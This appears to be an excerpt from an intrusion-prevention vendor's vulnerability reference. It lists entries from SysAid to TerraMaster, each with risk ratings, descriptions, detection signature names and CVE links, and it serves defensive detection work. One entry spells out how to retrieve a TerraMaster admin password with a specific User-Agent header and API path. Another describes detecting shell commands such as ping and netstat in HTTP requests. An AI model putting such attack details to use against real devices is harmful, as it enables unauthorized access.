SysAid-Help-Desk-Administrator-Portal-File-Upload

About this vulnerability:

SysAid Help Desk Administrator Portal File Upload vulnerability.

Risk:

High

First detected in:

sgpkg-ips-682-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

SysAid

Type:

Directory Traversal

Description:

A directory traversal and file upload vulnerability exists in SysAid, before 15.2, that allows remote attackers to execute arbitrary code by allowing the upload and execution of .jsp files.

Situation:

HTTP_CS-SysAid-Help-Desk-Administrator-Portal-File-Upload

References:

CVE-2015-2994
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2994

SysAid-Help-Desk-File-Disclosure

About this vulnerability:

A SysAid Help Desk File Disclosure vulnerability.

Risk:

High

First detected in:

sgpkg-ips-767-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

SysAid

Type:

Directory Traversal

Description:

A vulnerability in SysAid, versions before 15.2, which allows remote attackers to read, and download, arbitrary files, or cause a denial of service condition by the use of a directory traversal. This also covers CVE-2015-2997 and CVE-2015-2998.

Situation:

HTTP_CSU-SysAid-Help-Desk-File-Disclosure

References:

CVE-2015-2996
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2996

SysAid-On-Premise-Directory-Traversal-CVE-2023-47246

About this vulnerability:

A vulnerability in SysAid On-Premise

Risk:

Moderate

First detected in:

sgpkg-ips-1654-5242

Last changed:

sgpkg-ips-1654-5242

Platform:

Generic

Software:

SysAid

Type:

Input Validation

Description:

Improper validation of paths causes a directory traversal vulnerability in SysAid, which can be exploited to execute code on the target system.

Situation:

HTTP_CSU-SysAid-On-Premise-Directory-Traversal-CVE-2023-47246

References:

CVE-2023-47246
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-47246

SysAid-Rdslogs-Arbitrary-File-Upload

About this vulnerability:

A SysAid Rdslogs Arbitrary File Upload vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-767-5211

Last changed:

sgpkg-ips-1639-5242

Platform:

Generic

Software:

SysAid

Type:

Malfunction

Description:

A vulnerability in SysAid, versions before 15.2, which allows remote attackers to upload and execute arbitrary files by adding a NULL byte after the file extension.

Situation:

HTTP_CRL-Sysax-Multi-Server-Stack-Based-Buffer-Overflow

References:

CVE-2015-2995
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2995

Sysax-Multi-Server-Stack-Based-Buffer-Overflow

About this vulnerability:

A Sysax Multi Server Stack Based Buffer Overflow vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-705-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Sysax

Type:

Buffer Overflow

Description:

A stack based buffer overflow vulnerability in Sysax Multi Server, versions before 5.52, which allows remote attackers to execute arbitrary code via a crafted request.

Situation:

References:

CVE-2012-6530
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6530

BID-51548
http://www.securityfocus.com/bid/51548

OSVDB-82329
http://www.osvdb.org/82329

SysGauge-SMTP-Validation-Buffer-Overflow

About this vulnerability:	A SysGauge SMTP Validation Buffer Overflow vulnerability
Risk:	Moderate
First detected in:	sgpkg-ips-1022-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	SysGauge
Type:	Buffer Overflow
Description:	A buffer overflow vulnerability in SysGauge, version 1.5.18, which allows remote attackers to execute arbitrary code via a malicious response in the 220 service ready response.
Situation:	SMTP_SS-SysGauge-SMTP-Validation-Buffer-Overflow

Syssfic-Trojan-Infection-Traffic

About this vulnerability:	Syssfic trojan infection traffic was detected
Risk:	High
First detected in:	sgpkg-ips-1354-5242
Last changed:	sgpkg-ips-1354-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Syssfic trojan infection traffic was detected.
Situation:	HTTP_CSU-Syssfic-Trojan-Infection-Traffic

System-Command-Usage

About this vulnerability:	System command usage detected
Risk:	High
First detected in:	sgpkg-ips-448-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Any Software
Type:	Malfunction
Description:	Usage of a system command, such as "ping" or "netstat", has been detected in a HTTP request. This may be an attempt to execute commands on the server and retrieve information that is not intented to be accessible.
Situation:	HTTP_CRL-Possible-Netstat-Command-Usage HTTP_CRL-Possible-Ping-Command-Usage HTTP_CSH-Possible-Netstat-Command-Usage-In-Referer-Header HTTP_CSH-Possible-Ping-Command-Usage-In-Referer-Header

Systemd-Resolved-DNS_Packet_New-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Systemd Systemd

Risk:

High

First detected in:

sgpkg-ips-949-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Systemd

Type:

Buffer Overflow

Description:

There exists a heap buffer overflow vulnerability in systemd-resolved. A malicious DNS server may use this to execute arbitrary code on the target client.

Situation:

DNS-TCP_Systemd-Resolved-DNS_Packet_New-Heap-Buffer-Overflow

References:

CVE-2017-9445
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9445

Systemd-Resolved-DNS_Packet_Read_Type_Window-Infinite-Loop

About this vulnerability:

A vulnerability in Systemd Systemd

Risk:

Moderate

First detected in:

sgpkg-ips-1023-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Systemd

Type:

Infinite Loop

Description:

Improper parsing of DNS NSEC records in the dns_packet_read_type_window function of systemd-resolved causes an infinite loop, which can be exploited to cause a denial of service condition on the target system.

Situation:

DNS-UDP_Systemd-Resolved-DNS_Packet_Read_Type_Window-Infinite-Loop

References:

CVE-2017-15908
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15908

SysV-Login-BOF

About this vulnerability:

Buffer overflow in login in SysV derived systems

Risk:

High

First detected in:

sgpkg-ips-15-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

HP-UX 10; HP-UX 11; AIX 4; AIX 5; SCO; IRIX 3; Solaris; Solaris 7; Solaris 8

Software:

Generic telnet server

Type:

Buffer Overflow

Description:

System V (SYSV) derived systems are vulnerable to a static buffer overflow. The implementation of login (known as "/bin/login" for its location in the file system) for such SYSV-derived systems allows remote attackers to execute arbitrary commands on a target system with superuser privileges via a large number of arguments throught services such as telnet and rlogin.

Situation:

Telnet_SysV-Login-BOF-1
Telnet_SysV-Login-BOF-2
Telnet_SysV-Login-BOF-3
RLOGIN_System-V-Login-Buffer-Overflow

References:

CVE-2001-0797
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0797

BID-3681
http://www.securityfocus.com/bid/3681

OSVDB-690
http://www.osvdb.org/690

OSVDB-691
http://www.osvdb.org/691

TA551-Shathak-Malware-Infection-Traffic

About this vulnerability:	TA551 Shathak malware infection traffic detected
Risk:	High
First detected in:	sgpkg-ips-1294-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	TA551 Shathak malware infection traffic was detected.
Situation:	HTTP_CRL-TA551-Shathak-Malware-Infection-Traffic

TA551-Shathak-Malware-Infection-Traffic_2

About this vulnerability:	TA551 Shathak malware infection traffic detected
Risk:	High
First detected in:	sgpkg-ips-1352-5242
Last changed:	sgpkg-ips-1352-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	TA551 Shathak malware infection traffic was detected.
Situation:	HTTP_SHS-TA551-Malware-Infection-Traffic_2

TallSoft-Quick-TFTP-Server-Pro-2.1-Buffer-Overflow

About this vulnerability:

TallSoft Quick TFTP Server Pro 2.1 Stack Based Buffer Overflow

Risk:

High

First detected in:

sgpkg-ips-648-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

TallSoft Quick TFTP Server

Type:

Buffer Overflow

Description:

A stack based buffer overflow vulnerability in TallSoft Quick TFTP Server Pro 2.1, which allows attackers to remotly execute arbitrary code or cause a denial of service via a long mode field in a read or write request.

Situation:

TFTP_Trivial-File-Transfer-Protocol-Mode-String-Buffer-Overflow

References:

CVE-2008-1610
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1610

BID-28459
http://www.securityfocus.com/bid/28459

OSVDB-43784
http://www.osvdb.org/43784

Tandberg-Video-Server-Directory-Traversal

About this vulnerability:

Directory Traversal Vulnerability allows unauthrized access

Risk:

High

First detected in:

sgpkg-ips-332-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Tandberg Video Communication Server

Type:

Directory Traversal

Description:

Multiple directory traversal vulnerabilities in the web administration interface on the TANDBERG Video Communication Server (VCS) before X5.1 allow remote authenticated users to read arbitrary files.

Situation:

HTTP_CSU-Tandberg-Directory-Traversal-File-Disclosure

References:

CVE-2009-4511
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4511

Tarantool-Xrow_Header_Decode-Out-Of-Bounds-Read

About this vulnerability:

A vulnerability in Tarantool Tarantool

Risk:

Moderate

First detected in:

sgpkg-ips-853-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Tarantool

Type:

Malfunction

Description:

An out of bounds read vulnerability in the xrow_header_decode function of Tarantool can be used to trigger a denial of service condition.

Situation:

Generic_CS-Tarantool-Xrow_Header_Decode-Out-Of-Bounds-Read

References:

CVE-2016-9037
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9037

TBK-DVR4104-And-DVR4216-Authentication-Bypass-CVE-2018-9995

About this vulnerability:

A vulnerability in TBK DVR4104 and DVR4216

Risk:

High

First detected in:

sgpkg-ips-1815-5242

Last changed:

sgpkg-ips-1815-5242

Platform:

Generic

Software:

TBK DVR

Type:

Malfunction

Description:

An authentication bypass vulnerability has been reported in TBK DVR4104 and DVR4216 digital video recording devices. Novo, CeNova, QSee, Pulnix, XVR 5 in 1, Securus, Night OWL, DVR Login, HVR Login, and MDVR Login run rebranded versions of the vulnerable software and are also vulnerable.

Situation:

HTTP_CSH-TBK-DVR4104-And-DVR4216-Authentication-Bypass-CVE-2018-9995

References:

CVE-2018-9995
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9995

TCP-Microsoft-Message-Queuing-BOF

About this vulnerability:

Buffer overflow vulnerability in Microsoft Message Queuing

Risk:

High

First detected in:

sgpkg-ips-27-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Message Queuing

Type:

Buffer Overflow

Description:

Buffer overflow vulnerability exists in the Microsoft Message Queuing component on Windows 2000 and Windows XP SP1. A remote attacker can exploit this vulnerability to execute arbitrary code on the victim's machine.

Situation:

MSRPC-TCP_CPS-Microsoft-Message-Queuing-Buffer-Overflow

References:

CVE-2005-0059
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0059

BID-13112
http://www.securityfocus.com/bid/13112

OSVDB-15458
http://www.osvdb.org/15458

MS05-017
http://technet.microsoft.com/security/bulletin/MS05-017

TCP-MySQL-MaxDB-WebDBM-BOF

About this vulnerability:

Buffer overflow vulnerability in MySQL MaxDB WebDBM service

Risk:

High

First detected in:

sgpkg-ips-27-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

MySQL

Type:

Buffer Overflow

Description:

Buffer overflow vulnerability exists in the MySQL MaxDB WebDBM service. Remote attacker is able to exploit this vulnerability to execute arbitrary code on the victim's machine.

Situation:

HTTP_CSU-MySQL-MaxDB-WebDBM-BOF-3
HTTP_CSU-MySQL-MaxDB-WebDBM-BOF-2
HTTP_CSU-MySQL-MaxDB-WebDBM-BOF
Generic_MySQL-MaxDB-WebDBM-BOF

References:

CVE-2005-0684
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0684

BID-13368
http://www.securityfocus.com/bid/13368

OSVDB-15816
http://www.osvdb.org/15816

TCP-SCO-Unix-Calserver-Buffer-Overflow

About this vulnerability:

Buffer-overflow vulnerability in SCO UNIX calserver

Risk:

High

First detected in:

sgpkg-ips-8-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

SCO Internet FastStart, SCO Open Server

Type:

Buffer Overflow

Description:

SCO Unix calserver has a buffer-overflow vulnerability in the handling of long messages. A remote attacker can exploit this vulnerability to gain root access.

Situation:

Generic_CS-SCO-Unix-Calserver-Buffer-Overflow

References:

CVE-2000-0306
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0306

BID-2353
http://www.securityfocus.com/bid/2353

Tcpdump-ISAKMP-Payload-Handling-DOS

About this vulnerability:

A vulnerability in Network Research Group TCPdump

Risk:

Moderate

First detected in:

sgpkg-ips-410-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Tcpdump

Type:

Malfunction

Description:

Two vulnerabilities exist in the Tcpdump ISAKMP payload handling module, which can be exploited to cause a DoS (Denial of Service) by sending packets with specially crafted payloads. Exploiting either vulnerability will result in Tcpdump reading past a buffer allocating in the heap, resulting in a memory access error, or segmentation fault. Exploiting either vulnerability will result in the termination of Tcpdump.

Situation:

Generic_UDP-Tcpdump-ISAKMP-Payload-Handling-DOS

References:

CVE-2004-0183
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0183

BID-10003
http://www.securityfocus.com/bid/10003

TCP_Linux-Kernel-Firewall-Logging-Denial-Of-Service

About this vulnerability:

A vulnerability in Linux Kernel allows remote attacked to crahs the kernel via malformed TCP packet

Risk:

Moderate

First detected in:

sgpkg-ips-154-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

<os>

Type:

Malfunction

Description:

A vulnerability exists in the way the Linux kernel 2.6 firewall logs TCP packets. The vulnerability results from improper validation of the TCP header when a TCP segment matches a firewall rule. This vulnerability can allow a remote attacker to cause complete kernel failure on the target system by sending a specially crafted, and possibly spoofed, TCP packet.

Situation:

TCP_Header-Length-Error

References:

CVE-2004-0816
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0816

BID-11488
http://www.securityfocus.com/bid/11488

Tdss.c-Trojan

About this vulnerability:	TDSS.C trojan
Risk:	High
First detected in:	sgpkg-ips-617-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	Tdss.c is a Windows trojan.
Situation:	HTTP_CSH-Tdss.c-Trojan-Traffic

TeamViewer-Unquoted-URI-Handler-SMB-Redirect

About this vulnerability:

A vulnerability in TeamViewer.

Risk:

High

First detected in:

sgpkg-ips-1427-5242

Last changed:

sgpkg-ips-1427-5242

Platform:

Generic

Software:

TeamViewer

Type:

Input Validation

Description:

A vulnerability in TeamViewer, versions before 8.0.258861, 9.0.258860, 10.0.258873, 11.0.258870, 12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350, and 15.8.3, which allows remote attackers to force the victim to send an NTLM authentication request and either relay the request or capture the hash for offline password cracking, due to not properly quoting custom URI handlers.

Situation:

File-Text_TeamViewer-Unquoted-URI-Handler-SMB-Redirect

References:

CVE-2020-13699
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13699

TeamViewer-Usage

About this vulnerability:	TeamViewer usage
Risk:	Low
First detected in:	sgpkg-ips-275-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	TeamViewer
Type:	Remote Control
Description:	TeamViewer is a service that is able to share desktop connections, files, and private networks across machines, even if they are located behind firewalls. Use of this kind of applications may be considered a security risk in controlled environments.
Situation:	Generic_CS-TeamViewer-Client-Startup HTTP_CSH-TeamViewer-DynGate-Request

Technote-Main.cgi-File-Directory-Traversal

About this vulnerability:

Technote main.cgi file directory traversal

Risk:

Moderate

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1637-5242

Platform:

Generic

Software:

Technote

Type:

Directory Traversal

Description:

A directory traversal vulnerability in main.cgi allows an attacker to read arbitrary files.

References:

CVE-2001-0075
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0075

BID-2156
http://www.securityfocus.com/bid/2156

Technote-Print.cgi-Directory-Traversal

About this vulnerability:

Technote print.cgi directory traversal

Risk:

Moderate

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1637-5242

Platform:

Generic

Software:

Technote

Type:

Directory Traversal

Description:

A directory traversal vulnerability in print.cgi allows an attacker to read arbitrary files.

References:

CVE-2001-0075
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0075

BID-2156
http://www.securityfocus.com/bid/2156

Tedroo-Bot

About this vulnerability:	Tedroo Bot
Risk:	High
First detected in:	sgpkg-ips-619-5211
Last changed:	sgpkg-ips-1338-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	Tedroo is a Botnet used for sending spam e-mail.

Telerik-UI-File-Upload-CVE-2017-11317

About this vulnerability:

A vulnerability in Telerik UI

Risk:

Moderate

First detected in:

sgpkg-ips-1055-5242

Last changed:

sgpkg-ips-1368-5242

Platform:

Windows

Software:

Telerik UI

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Telerik UI

Situation:

HTTP_CSU-Telerik-UI-File-Upload-CVE-2017-11317

References:

CVE-2017-11317
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11317

Telerik-UI-For-ASP.NET-Remote-Code-Execution

About this vulnerability:

An attempt to exploit a vulnerability in Telerik UI For ASP.NET detected

Risk:

High

First detected in:

sgpkg-ips-1405-5242

Last changed:

sgpkg-ips-1405-5242

Platform:

Generic

Software:

Telerik UI

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Telerik UI For ASP.NET detected.

Situation:

HTTP_CSU-Telerik-UI-For-ASP.NET-Remote-Code-Execution

References:

CVE-2017-9248
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9248

Telerik-UI-Insecure-Deserialization-CVE-2019-18935

About this vulnerability:

A vulnerability in Telerik UI

Risk:

Moderate

First detected in:

sgpkg-ips-1261-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Telerik UI

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Telerik UI

Situation:

File-Text_Telerik-UI-Insecure-Deserialization-CVE-2019-18935

References:

CVE-2019-18935
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18935

Telesquare-Router-Command-Injection-Vulnerability-CVE-2021-46422

About this vulnerability:

An attempt to exploit a vulnerability in Telesquare Router detected

Risk:

High

First detected in:

sgpkg-ips-1606-5242

Last changed:

sgpkg-ips-1606-5242

Platform:

Generic

Software:

Telesquare Router

Type:

Input Validation

Description:

Telesquare SDT-CW3B1 router 1.1.0 is affected by an OS command injection vulnerability that allows a remote attacker to execute OS commands without any authentication.

Situation:

HTTP_CSU-Telesquare-Router-Command-Injection-Vulnerability-CVE-2021-46422

References:

CVE-2021-46422
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46422

Telnet-Cisco-Telnetd-Failed-Login

About this vulnerability:	Failed login attempt against a Cisco telnet daemon
Risk:	Low
First detected in:	sgpkg-ips-72-1314
Last changed:	sgpkg-ips-1296-5242
Platform:	Cisco IOS
Software:	Cisco telnetd
Type:	Failed Login
Description:	Failed Telnet login attempt against a Cisco telnet daemon. If these failed attempts come in large numbers from a single host, a remote attacker may be trying to guess passwords via a brute-force method.
Situation:	Telnet_STS-Cisco-Failed-Login

Telnet-Client-Env-Opt-Add-Function-BOF

About this vulnerability:

Buffer overflow in various BSD-based Telnet clients

Risk:

Moderate

First detected in:

sgpkg-ips-68-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Generic telnet client

Type:

Buffer Overflow

Description:

Various vendors' BSD-based Telnet clients contain a buffer overflow in the env_opt_add() function. A remote attacker could send a malicious server reply to overflow a buffer and to execute arbitrary code in the context of the user that is using the vulnerable client software.

Situation:

Telnet_SCS-Telnet-Client-Env-Opt-Add-Function-BOF

References:

CVE-2005-0468
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0468

BID-12919
http://www.securityfocus.com/bid/12919

OSVDB-15093
http://www.osvdb.org/15093

Telnet-Client-Slc-Add-Reply-Function-BOF

About this vulnerability:

Buffer overflow vulnerability in various BSD-based Telnet clients

Risk:

Moderate

First detected in:

sgpkg-ips-68-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Generic telnet client

Type:

Buffer Overflow

Description:

Various vendors' BSD-based Telnet clients contain a buffer overflow in the slc_add_reply() function LINEMODE suboptions handling. A remote attacker could send a malicious server reply with a large number of Set Local Character (SLC) commands to overflow a buffer and to execute arbitrary code in the context of the user that is using the vulnerable client software.

Situation:

Telnet_SCS-Telnet-Client-Slc-Add-Reply-Function-BOF

References:

CVE-2005-0469
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0469

BID-12918
http://www.securityfocus.com/bid/12918

OSVDB-15094
http://www.osvdb.org/15094

Telnet-Failed-Login

About this vulnerability:	Failed Telnet login
Risk:	Low
First detected in:	sgpkg-ips-65-1210
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Generic telnet server
Type:	Failed Login
Description:	Failed Telnet login attempt. If these failed attempts come in large numbers from a single host, a remote attacker may be trying to guess passwords via a brute-force method.
Situation:	Telnet_STS-Failed-Login

Telnet-Kerberos-Login-Authentication-Bypass

About this vulnerability:

Kerberos bug allows unauthorized Login

Risk:

High

First detected in:

sgpkg-ips-253-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Generic telnet server

Type:

Malfunction

Description:

Vulnerable telnet daemons allow remote client to bypass authentication and gain system access via specially crafted login name.

Situation:

Telnet_CCS-Kerberos-Authentication-Bypass

References:

CVE-2007-0956
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0956

BID-23281
http://www.securityfocus.com/bid/23281

Telnet-Linkerbug

About this vulnerability:

Telnetd allows changing of LD_LIBRARY_PATH remotely

Risk:

High

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Generic telnet server

Type:

Malfunction

Description:

Vulnerable telnet daemons allow remote client to specify its environment variables. LD_LIBRARY_PATH is such variable. Changing LD_LIBRARY_PATH could lead to client specified arbitrary code execution using root priviledges in the telnetd server.

Situation:

Telnet_CCS-Ld-Library-Path-Attack

References:

CVE-1999-0073
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0073

Telnet-Microsoft-Telnet-Client-Information-Disclosure

About this vulnerability:

Information disclosure vulnerability in the Telnet client for Microsoft Windows

Risk:

Low

First detected in:

sgpkg-ips-97-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP; Windows 2003

Software:

Microsoft Services for UNIX

Type:

Malfunction

Description:

There is an information disclosure vulnerability in the Telnet client for Microsoft Windows. By persuading a target user to connect to a malicious server with the vulnerable telnet client, a remote attacker can obtain the environment variables of the user. The persuasion can be done by constructing a web page containing an URL starting with the protocol spesification 'telnet://'.

Situation:

Telnet_SCS-Microsoft-Telnet-Client-Information-Disclosure

References:

CVE-2005-1205
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1205

BID-13940
http://www.securityfocus.com/bid/13940

OSVDB-17303
http://www.osvdb.org/17303

MS05-033
http://technet.microsoft.com/security/bulletin/MS05-033

Telnet-Resolv-Host-Conf-Manipulation

About this vulnerability:

Unauthorized file access

Risk:

Moderate

First detected in:

sgpkg-ips-253-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Generic telnet server

Type:

Malfunction

Description:

By manipulating RESOLV_HOST_CONF environment variable, a logged in user can have unauthorized access to system files.

Situation:

Telnet_CCS-Resolv-Host-Conf-Disclosure

References:

CVE-2001-0170
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0170

BID-2181
http://www.securityfocus.com/bid/2181

Telnet-Usage

About this vulnerability:	Telnet usage detection.
Risk:	Low
First detected in:	sgpkg-ips-28-1210
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Generic telnet server
Type:	Remote Control
Description:	This vulnerability is referenced by fingerprints that detect Telnet protocol usage. Telnet transfers all data between the client and the server in cleartext making it possible for third parties to listen for sensitive data such as passwords.
Situation:	Telnet_Telnet-Usage

Teltonika-RUT9XX-Router-OS-Command-Injection-CVE-2018-17532

About this vulnerability:

A vulnerability in Teltonika RUT9XX routers

Risk:

High

First detected in:

sgpkg-ips-1818-5242

Last changed:

sgpkg-ips-1818-5242

Platform:

Generic

Software:

Teltonika RUT9XX

Type:

Input Validation

Description:

An OS command injection vulnerability has been reported in Teltonika RUT9XX routers with firmware versions before 00.04.233. An unauthenticated attacker can use this vulnerability to execute arbitrary commands by sending a crafted HTTP request to autologin.cgi or hotspotlogin.cgi.

Situation:

HTTP_CRL-Teltonika-RUT9XX-Router-OS-Command-Injection-CVE-2018-17532

References:

CVE-2018-17532
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17532

Tenda-AC11-Remote-Code-Execution-CVE-2021-31755

About this vulnerability:

An attempt to exploit a vulnerability in Tenda AC11 detected

Risk:

High

First detected in:

sgpkg-ips-1406-5242

Last changed:

sgpkg-ips-1406-5242

Platform:

Generic

Software:

Tenda

Type:

Buffer Overflow

Description:

A stack buffer overflow has been reported in Tenda AC11 routers. A remote, unauthenticated attacker can exploit the vulnerability by sending a crafted POST request. Successful exploitation of this vulnerability could allow arbitrary code execution.

Situation:

HTTP_CRL-Tenda-AC11-Remote-Code-Execution-CVE-2021-31755

References:

CVE-2021-31755
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31755

Tenda-AC15-AC1900-Remote-Code-Execution-CVE-2020-10987

About this vulnerability:

A vulnerability in Tenda AC15 AC1900 routers

Risk:

High

First detected in:

sgpkg-ips-1403-5242

Last changed:

sgpkg-ips-1403-5242

Platform:

Generic

Software:

Tenda

Type:

Input Validation

Description:

There exists a remote code execution vulnerability in Tenda AC15 AC1900 routers. A successful exploitation of this vulnerability could lead in arbitrary command execution via the deviceName parameter.

Situation:

HTTP_CRL-Tenda-AC15-AC1900-Remote-Code-Execution-CVE-2020-10987

References:

CVE-2020-10987
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10987

Tenda-AC18-Remote-Code-Execution-CVE-2022-31446

About this vulnerability:

A vulnerability in Tenda AC18

Risk:

High

First detected in:

sgpkg-ips-1510-5242

Last changed:

sgpkg-ips-1510-5242

Platform:

Generic

Software:

Tenda

Type:

Input Validation

Description:

An unauthenticated remote code execution vulnerability has been reported in the web server component of Tenda AC18 routers.

Situation:

HTTP_CRL-Tenda-AC18-Remote-Code-Execution-CVE-2022-31446

References:

CVE-2022-31446
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31446

Tenda-AX3-Command-Injection-CVE-2023-27240

About this vulnerability:

A vulnerability in Tenda AX3 routers

Risk:

High

First detected in:

sgpkg-ips-1606-5242

Last changed:

sgpkg-ips-1606-5242

Platform:

Generic

Software:

Tenda

Type:

Input Validation

Description:

A command injection vulnerability has been reported in Tenda AX3 router firmware version V16.03.12.11. An unauthenticated attacker could use this vulnerability to execute arbitrary commands.

Situation:

HTTP_CS-Tenda-AX3-Command-Injection-CVE-2023-27240

References:

CVE-2023-27240
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27240

Tenda-ONT-GPON-AC1200-HG9-Command-Injection-CVE-2022-30023

About this vulnerability:

A vulnerability in Tenda ONT GPON AC1200 HG9

Risk:

High

First detected in:

sgpkg-ips-1606-5242

Last changed:

sgpkg-ips-1606-5242

Platform:

Generic

Software:

Tenda

Type:

Input Validation

Description:

A command injection vulnerability has been reported in Tenda ONT GPON AC1200 HG9 wireless routers. An authenticated attacker could use this vulnerability to execute arbitrary commands.

Situation:

HTTP_CRL-Tenda-ONT-GPON-AC1200-HG9-Command-Injection-CVE-2022-30023

References:

CVE-2022-30023
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30023

Teredo-Tunneling-Protocol

About this vulnerability:	Teredo IPv6 tunneling protocol
Risk:	Moderate
First detected in:	sgpkg-ips-120-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows XP; Windows 2003; Windows Vista
Software:	<os>
Type:	Insecure Configuration
Description:	Teredo is an IPv6 tunneling protocol included in various versions of Microsoft Windows, including Windows Vista where it is enabled by default. Teredo allows tunneling of arbitrary IPv6 traffic over IPv4. While Teredo is not malicious by itself, it may be used to bypass network access controls.

TerraMaster-TOS-ajaxdata.php-Multiple-Command-Injections

About this vulnerability:

A vulnerability in TerraMaster TOS

Risk:

High

First detected in:

sgpkg-ips-1323-5242

Last changed:

sgpkg-ips-1373-5242

Platform:

Generic

Software:

TerraMaster TOS

Type:

Input Validation

Description:

There exists multiple command injection vulnerabilities in ajaxdata.php in TerraMaster TOS 3.1.03. This fingerprint covers CVE-2018-13330, CVE-2018-13336, CVE-2018-13338, CVE-2018-13353, CVE-2018-13358 and CVE-2018-13418.

Situation:

HTTP_CRL-TerraMaster-TOS-ajaxdata.php-Multiple-Command-Injections

References:

CVE-2018-13336
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13336

TerraMaster-TOS-Remote-Command-Execution-Vulnerability-CVE-2022-24990

About this vulnerability:

An attempt to exploit a vulnerability in TerraMaster TOS detected

Risk:

High

First detected in:

sgpkg-ips-1592-5242

Last changed:

sgpkg-ips-1624-5242

Platform:

Unix; Linux

Software:

TerraMaster TOS

Type:

Insecure Configuration

Description:

TerraMaster OS 4.2.29 and earlier allows remote attackers to discover the administrative password by sending "User-Agent: TNAS" to "module/api.php?mobile/webNasIPS" and then reading the PWD field in the response.

Situation:

File-Text_TerraMaster-TOS-Remote-Command-Execution-Vulnerability-CVE-2022-24990

References:

CVE-2022-24990
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24990

TerraMaster-TOS-Unauthenticated-RCE-CVE-2022-24989

About this vulnerability:

